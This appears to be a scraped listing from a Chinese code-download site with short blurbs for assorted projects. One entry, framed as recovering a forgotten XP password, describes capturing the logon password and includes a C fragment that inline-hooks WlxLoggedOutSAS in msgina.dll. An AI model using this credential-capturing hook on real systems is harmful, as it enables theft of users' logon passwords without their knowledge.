-
基于WINDOWS 串口无线通信软件,批量管理LED计时器
基于WINDOWS平台开发的串口无线通信软件,用于批量管理带有无线发送模块的LED大屏幕计时器系统。系统实现了自动数据采集、时间同步、数据记录、EXCEL表格生成、自动清零等功能,无人值守。
- 2022-07-09 12:16:27下载
- 积分:1
-
telechips 的cmmb sdk框架代码,熟悉的下吧!
telechips 的cmmb sdk框架代码,熟悉的下吧!
- 2022-04-27 05:58:30下载
- 积分:1
-
An example of using URBI via LibURBI in C
An example of using URBI via LibURBI in C-An example of using URBI via LibURBI in C++
- 2022-02-15 01:49:10下载
- 积分:1
-
pocketc写的截图软件,自己任意截图,源码下载
pocketc写的截图软件,自己任意截图,源码下载-pocketc screenshots of the software to write their own arbitrary screenshots, source code download
- 2022-08-10 16:29:13下载
- 积分:1
-
it is C or C++ .and it can be used by the newer .it is very easy.i think you can...
it is C or C++ .and it can be used by the newer .it is very easy.i think you can learn it.
- 2023-07-24 04:40:02下载
- 积分:1
-
服务匹配代码
服务匹配代码
服务匹配代码
服务匹配代码
服务匹配代码
服务匹配代码-Matching Service code
- 2022-04-27 17:07:53下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
一个用java写的Email收发例子CSMailForm1.1 ,方便实用,界面简单
一个用java写的Email收发例子CSMailForm1.1 ,方便实用,界面简单-with a written Email transceiver CSMailForm1.1 example, convenient and practical, simple interface
- 2022-03-11 22:48:55下载
- 积分:1
-
This the VB6 code for Car Message Display.
This the VB6 code for Car Message Display.-This is the VB6 code for Car Message Display.
- 2022-01-27 15:06:43下载
- 积分:1
-
游戏用C #
资源描述简单的C编程语言的源#你tic-tac-toe ;是给定的,玩家可以用鼠标玩。该游戏已经实现了2个玩家模式和程序自动确定谁是赢家。这个应用程序的开发人员是不完整的游戏从来没有声称的编程代码的剂量和目标群体只是为了展示如何设计游戏的难题。
- 2022-12-31 00:30:04下载
- 积分:1